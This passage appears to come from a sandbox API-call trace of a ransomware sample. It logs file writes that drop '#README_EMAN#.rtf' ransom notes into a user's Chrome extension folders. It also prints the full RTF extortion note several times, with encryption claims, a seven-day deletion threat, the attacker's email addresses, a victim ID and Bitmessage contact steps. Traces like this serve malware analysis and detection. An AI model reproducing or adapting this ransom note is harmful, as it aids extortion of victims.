s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.367] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.367] CloseHandle (hObject=0x294) returned 1 [0273.367] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\#readme_eman#.rtf")) returned 0xffffffff [0273.368] GetLastError () returned 0x2 [0273.368] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.368] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.368] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.368] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not 